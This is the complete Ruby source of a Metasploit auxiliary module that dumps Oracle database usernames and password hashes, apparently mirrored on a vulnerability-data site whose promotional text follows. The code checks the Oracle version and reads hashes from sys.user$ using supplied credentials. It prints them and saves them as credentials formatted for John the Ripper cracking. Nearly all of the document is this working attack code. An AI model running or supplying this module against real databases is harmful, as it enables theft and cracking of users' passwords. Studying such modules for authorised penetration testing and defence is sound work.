##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::ORACLE
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Oracle Password Hashdump',
'Description' => %Q{
This module dumps the usernames and password hashes
from Oracle given the proper Credentials and SID.
These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.
This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
},
'Author' => ['theLightCosine'],
'License' => MSF_LICENSE
)
end
def run_host(ip)
return if not check_dependencies
# Checks for Version of Oracle. Behavior varies with oracle version.
# 12c uses SHA-512 (explained in more detail in report_hashes() below)
# 11g uses SHA-1 while 8i-10g use DES
query = 'select * from v$version'
ver = prepare_exec(query)
if ver.nil?
print_error("An error has occurred while querying for the Oracle version. Please check your OPTIONS")
return
end
unless ver.empty?
case
when ver[0].include?('8i')
ver='8i'
when ver[0].include?('9i')
ver='9i'
when ver[0].include?('10g')
ver='10g'
when ver[0].include?('11g')
ver='11g'
when ver[0].include?('12c')
ver='12c'
when ver[0].include?('18c')
print_error("Version 18c is not currently supported")
return
else
print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
return
end
vprint_status("Server is running version #{ver}")
end
this_service = report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:name => 'oracle',
:proto => 'tcp'
)
tbl = Rex::Text::Table.new(
'Header' => 'Oracle Server Hashes',
'Indent' => 1,
'Columns' => ['Username', 'Hash']
)
begin
case ver
when '8i', '9i', '10g' # Get the usernames and hashes for 8i-10g
query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
results= prepare_exec(query)
unless results.empty?
results.each do |result|
row= result.split(/,/)
tbl << row
end
end
when '11g', '12c' # Get the usernames and hashes for 11g or 12c
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
results= prepare_exec(query)
#print_status("Results: #{results.inspect}")
unless results.empty?
results.each do |result|
row= result.split(/,/)
next unless row.length == 2
tbl << row
end
end
end
rescue => e
print_error("An error occurred. The supplied credentials may not have proper privileges")
return
end
print_status("Hash table :\n #{tbl}")
report_hashes(tbl, ver, ip, this_service)
end
# Save each row in the hash table as credentials (shown by "creds" command)
# This is done slightly differently, depending on the version
def report_hashes(table, ver, ip, service)
# Before module jtr_oracle_fast cracks these hashes, they are converted (based on jtr_format)
# to a format that John The Ripper can handle. This format is stored here.
case ver
when '8i', '10g'
jtr_format = "des,oracle"
when '11g'
jtr_format = "raw-sha1,oracle11"
when '12c'
jtr_format = "oracle12c"
end
service_data = {
address: Rex::Socket.getaddress(ip),
port: service[:port],
protocol: service[:proto],
service_name: service[:name],
workspace_id: myworkspace_id
}
# For each row in the hash table, save its corresponding credential data and JTR format
table.rows.each do |row|
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
username: row[0],
private_data: row[1],
private_type: :nonreplayable_hash,
jtr_format: jtr_format
}
credential_core = create_credential(credential_data.merge(service_data))
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
create_credential_login(login_data.merge(service_data))
end
print_good("Hash Table has been saved")
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation